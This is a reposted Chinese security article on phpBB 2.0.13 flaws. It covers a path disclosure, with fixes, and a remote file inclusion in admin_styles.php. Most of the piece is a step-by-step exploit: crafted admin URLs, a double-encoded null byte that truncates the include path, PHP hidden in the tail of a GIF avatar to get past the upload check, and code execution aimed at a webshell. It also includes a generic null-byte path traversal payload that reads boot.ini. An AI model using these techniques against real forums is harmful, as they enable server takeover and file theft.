您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

phpBB 2.0.13 Path Disclosure And Remote php File Include

2009-2-4 08:29| 投稿: security

摘要: 本文作者:SuperHei文章性质:原创发布日期:2005-08-14 文/图 安全天使·superhei 一、Path Disclosure 漏洞文件:/db/oracle.php漏...
本文作者:SuperHei文章性质:原创发布日期:2005-08-14 文/图 安全天使·superhei 一、Path Disclosure 漏洞文件:/db/oracle.php漏洞描叙:直接访问oracle.php,导致暴露web路径涉及版本:phpbb <=2.013 测试:ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误: Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\oracle.php on line 405 解决办法 如果你不是采用的oracle数据库,可以直接把oracle.php删除 修改php.ini设置: display_errors = Off 二、Remote php File Include 漏洞文件:/admin/admin_styles.php漏洞描叙:admin_styles.php文件里变量过滤不严,导致从后台执行恶意代码,从而危险服务器安全涉及版本:phpbb <=2.013+ php <5.0 漏洞分析: 71 case "addnew":72 $install_to = ( isset($HTTP_GET_VARS['install_to']) ) ? urldecode($HTTP_GET_VARS['install_to']) : $HTTP_POST_VARS['install_to'];73 $style_name = ( isset($HTTP_GET_VARS['style']) ) ? urldecode($HTTP_GET_VARS['style']) : $HTTP_POST_VARS['style'];74 75 if( isset($install_to) )76 {7778 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");7980 $template_name = $$install_to;81 $found = FALSE; $install_to变量过滤不严,导致被include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");调用,入侵者可以通过构造 $install_to达到攻击目的 测试分析(目的:从后台得到webshelll): 首先我们只看78行代码 78 include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg"); include最终于是执行了theme_info.cfg文件,theme_info.cfg是保存“风格”的一些设置 如果我们可以在从在theme_info.cfg文件插入恶意代码,那么就直接通过include执行了我们的代码 :) [思路参考《从后台到webshell的一点思路》]我们来测试下: 后台风格管理-->管理选项--->编辑-->CSS 风格表 输入";phpinfo();" (也可以是其他变量插入),然后“输出”设置成功保存到theme_info.cfg文件 我们在打开theme_info.cfg看看: $subSilver[0]['head_stylesheet'] = "subSilver.css\";phpinfo();\""; 郁闷"被过滤了,我是在 magic_quotes_gpc = off 下测试的 看来phpbb本身对做了过滤 ,此路不通 :( 在对于<5.0(不包括4.10)的php本身存在对null截断的漏洞: ------------------------------- 漏洞具体描叙 start -------------------------------PHP存在输入验证漏洞,远程攻击者可以利用这个漏洞读取系统文件内容及进行目录遍历攻击。 问题一是addslashes()存在问题,addslashes()用于过滤用户输入,在magic_quotes_gpc设置"on"时,将对每个输入执行addslashes()进行过滤,但是由于NULL字节不正确被addslashes()编码,如果用户输入被include()或require()使用,可能导致攻击者读取文件系统的任意文件。 问题二是上传路径遍历问题,PHP自动过滤上传的文件名数据,删除在斜杠或反斜杠之前的数据,但是如果攻击者上传的文件包含单引号,而WEB服务又设置magic_quotes为ON,或者对上传文件名执行addslashes()操作,那么在单引号前会前缀一个反斜杠,因此在Windows系统可造成目录遍历问题,导致文件上传到系统任意目录中。 POC: 代码: <?$whatever = addslashes($_REQUEST['whatever']);include("/path/to/program/" . $whatever . "/header.htm");?> 恶意攻击者可以提交如下URL获得文件内容: http://localhost/phpscript.php?whatever=../../../../boot.ini%00 ------------------------------- 漏洞具体描叙 end ------------------------------- 下面我们回到phpbb 首先我们测试下%00,提交: http://127.0.0.1/phpBB2/admin/admin_styles.php?mode=addnew&install_to=theme_info.cfg%00&sid=695b9ddfe24706eb9ea1e43e62cbd634 得到错误: Warning: main(./../templates/theme_info.cfg\0/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78 Warning: main(): Failed opening './../templates/theme_info.cfg\0/theme_info.cfg' for inclusion (include_path='.;f:\EasyPHP1-7\php\pear\') in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7 %00变从了\0,phpbb就是变态,既然%00不行 我们在看到72行代码: 72 $install_to = ( isset($HTTP_GET_VARS['install_to']) ) ? urldecode($HTTP_GET_VARS['install_to']) : $HTTP_POST_VARS['install_to']; 我们使用ie提交的方式是get 那么我们提交的&install_to,要被urldecode()解析,那么我们可以先把%00进行url编码一次:%25%30%30 提交: http://127.0.0.1/phpBB2/admin/admin_styles.php?mode=addnew&install_to=theme_info.cfg%25%30%30&sid=695b9ddfe24706eb9ea1e43e62cbd634 返回: Warning: main(./../templates/theme_info.cfg): failed to open stream: No such file or directory in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 78 Warning: main(): Failed opening './../templates/theme_info.cfg' for inclusion (include_path='.;f:\EasyPHP1-7\php\pear\') in f:\easyphp1-7\www\phpbb2\admin\admin_styles.php on line 7 注意和%00时比较 %00     ---> main(./../templates/theme_info.cfg\0/theme_info.cfg)%25%30%30 ---> Warning: main(./../templates/theme_info.cfg) 哈哈 include成功被截断,那么我们可以利用../来调用容易文件咯 :) 具体利用 我们把phpshell代码保存为gif或其他图片格式,在通过论坛上传 然后利用构造 install_to 而被 include() 调用并执行。 这里phpshell代码代码使用 <?phpinfo()?> 保存为 1.gif 我们到 http://127.0.0.1/phpBB2/profile.php?mode=editprofile 上传图像 返回错误:The avatar filetype must be .jpg, .gif or .png 如图1 大家都晓得图片文件都有他的“特殊标志” ,用uedit等编辑工具你就可以发现如 gif 文件的开头有“GIF89a” 看来phpbb在判断后缀后还用了 getimagesize() 或类似的函数判断,那么我们怎么绕过去呢?注意gif的文件尾部有个“0000...”的空数据区,我们就可以把php代码写到这个里面。 如图2 我们在上传这个修改了的 1.gif 文件上传! 呵呵上传成功,我们在察看你个人的资料察看原代码你就可以看到你上传后的文件为:images/avatars/109064250b9ce7ec7f.gif 如图3 ,接下来就是去构造 &install_to ,让 include 包含我们上传的images/avatars/109064250b9ce7ec7f.gif 从而执行我们的代码 :) 提交: /Article/UploadFiles/200508/20050820063502437.gif%25%30%30&sid=695b9ddfe24706eb9ea1e43e62cbd634 哈哈~ 成功返回phpinfo 如图4 剩下的我就不多说了 :)。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部